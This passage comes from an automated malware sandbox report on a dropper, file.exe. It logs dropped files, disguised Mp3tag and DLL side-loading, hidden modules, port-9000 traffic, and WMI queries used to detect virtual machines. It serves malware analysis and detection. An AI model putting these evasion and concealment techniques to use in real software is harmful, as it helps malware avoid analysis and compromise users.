NULLSDocument8 source: Mp3tag.exe
                            Source: Binary string: rcdc.pdbFirst != NULL && rcdc.pdbLast != NULL source: Mp3tag.exe
                            Source: Binary string: Y:\build\binaries\mp3tag\Mp3tag64.pdb source: Mp3tag.exe
                            Source: Binary string: ntdll.pdb source: Mp3tag.exe, 00000007.00000002.1384357397.0000000002EC0000.00000004.00000020.00020000.00000000.sdmp, Mp3tag.exe, 00000007.00000002.1384655119.00000000032C0000.00000004.00000800.00020000.00000000.sdmp, Mp3tag.exe, 00000009.00000002.1515559005.0000000003170000.00000004.00000800.00020000.00000000.sdmp, Mp3tag.exe, 00000009.00000002.1516217493.0000000003374000.00000004.00000001.00020000.00000000.sdmp, Mp3tag.exe, 00000009.00000002.1514986366.0000000002D7F000.00000004.00000020.00020000.00000000.sdmp, Mp3tag.exe, 0000000F.00000002.1822098294.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, Mp3tag.exe, 0000000F.00000002.1821488340.0000000002DE3000.00000004.00000020.00020000.00000000.sdmp, Mp3tag.exe, 0000000F.00000002.1822379976.00000000033E9000.00000004.00000001.00020000.00000000.sdmp
                            Source: Binary string: wntdll.pdbUGP source: cmd.exe, 0000000B.00000002.1779165142.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1778939346.0000000004685000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2055918179.0000000005310000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2055438521.0000000004E35000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: ntdll.pdbUGP source: Mp3tag.exe, 00000007.00000002.1384357397.0000000002EC0000.00000004.00000020.00020000.00000000.sdmp, Mp3tag.exe, 00000007.00000002.1384655119.00000000032C0000.00000004.00000800.00020000.00000000.sdmp, Mp3tag.exe, 00000009.00000002.1515559005.0000000003170000.00000004.00000800.00020000.00000000.sdmp, Mp3tag.exe, 00000009.00000002.1516217493.0000000003374000.00000004.00000001.00020000.00000000.sdmp, Mp3tag.exe, 00000009.00000002.1514986366.0000000002D7F000.00000004.00000020.00020000.00000000.sdmp, Mp3tag.exe, 0000000F.00000002.1822098294.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, Mp3tag.exe, 0000000F.00000002.1821488340.0000000002DE3000.00000004.00000020.00020000.00000000.sdmp, Mp3tag.exe, 0000000F.00000002.1822379976.00000000033E9000.00000004.00000001.00020000.00000000.sdmp
                            Source: Binary string: wntdll.pdb source: cmd.exe, 0000000B.00000002.1779165142.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1778939346.0000000004685000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2055918179.0000000005310000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2055438521.0000000004E35000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: Y:\build\binaries\mp3tag\Mp3tag64.pdb? source: Mp3tag.exe
                            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxzip64\Release\sfxzip.pdb source: file.exe
                            Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                            Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                            Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                            Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                            Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Bijouterie\__tmp_rar_sfx_access_check_5087812Jump to behavior
                            Source: file.exeStatic PE information: section name: .didat
                            Source: file.exeStatic PE information: section name: _RDATA
                            Source: Mp3tag.exe.5.drStatic PE information: section name: _RDATA
                            Source: tak_deco_lib.dll.5.drStatic PE information: section name: .didata
                            Source: Mp3tag.exe.7.drStatic PE information: section name: _RDATA
                            Source: tak_deco_lib.dll.7.drStatic PE information: section name: .didata
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_022BEC5D push eax; iretd 14_2_022BEC5E
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_066E53D1 push esp; ret 14_2_066E53D9
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_066EA56A pushad ; ret 14_2_066EA56B
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_066E958B push eax; retf 14_2_066E9591
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 14_2_066EA597 pushad ; ret 14_2_066EA59B
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeCode function: 15_2_0014D1DA push ecx; retf 15_2_0014D309
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeCode function: 15_2_0014E1F0 pushad ; retf 15_2_0014E1F1
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeCode function: 15_2_0014B6BC push ecx; retf 15_2_0014B709
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeCode function: 15_2_0014CF3A push ecx; retf 15_2_0014D1D9
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeCode function: 15_2_0014B6A8 push ecx; retf 15_2_0014B709
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeCode function: 15_2_0054DB60 push eax; retf 0054h15_2_0054DB61
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeCode function: 15_2_005C6A13 push esi; ret 15_2_005C6A15
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeCode function: 15_2_005C694C pushfd ; retf 15_2_005C694D
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeCode function: 15_2_02C8E921 push eax; ret 15_2_02C8E94F
                            Source: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeCode function: 15_2_02C7EF93 push 3B0CC483h; ret 15_2_02C7EF98
                            Source: umfcpwvoouwjq.11.drStatic PE information: section name: .text entropy: 6.816454717546241
                            Source: lcqqpedjyaav.16.drStatic PE information: section name: .text entropy: 6.816454717546241
                            Source: C:\Users\user\AppData\Local\Temp\Bijouterie\Mp3tag.exeFile created: C:\Users\user\AppData\Roaming\Downloadplugin\tak_deco_lib.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\lcqqpedjyaavJump to dropped file
                            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Bijouterie\tak_deco_lib.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\Bijouterie\Mp3tag.exeFile created: C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\umfcpwvoouwjqJump to dropped file
                            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\Bijouterie\Mp3tag.exeJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\umfcpwvoouwjqJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\lcqqpedjyaavJump to dropped file

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Found hidden mapped module (file has been removed from disk)
                            Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\UMFCPWVOOUWJQ
                            Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\LCQQPEDJYAAV
                            Uses known network protocols on non-standard ports
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49794
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49799
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49803
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49806
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49811
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49817
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49821
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49826
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49831
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49837
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49840
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49845
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49849
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49853
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49858
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49863
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49866
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49872
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49876
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49881
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49885
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49889
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49895
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49898
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49904
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49908
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49913
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49917
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49921
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49927
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49930
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49935
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49939
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49943
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49948
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49952
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49957
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49962
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49966
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49971
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49975
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49979
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49983
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49989
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                            Malware Analysis System Evasion

                            barindex
                            Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Switches to a custom stack to bypass stack traces
                            Source: C:\Windows\SysWOW64\cmd.exeAPI/Special instruction interceptor: Address: 6CFC3B54
                            Source: C:\Windows\SysWOW64\cmd.exeAPI/Special instruction interceptor: Address: 6B903B54
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 22B0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2410000 memory reserve | memory write watchJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 4410000 memory reserve | memory write watchJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 17B0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 32C0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 1930000 memory reserve | memory write watchJump to behavior
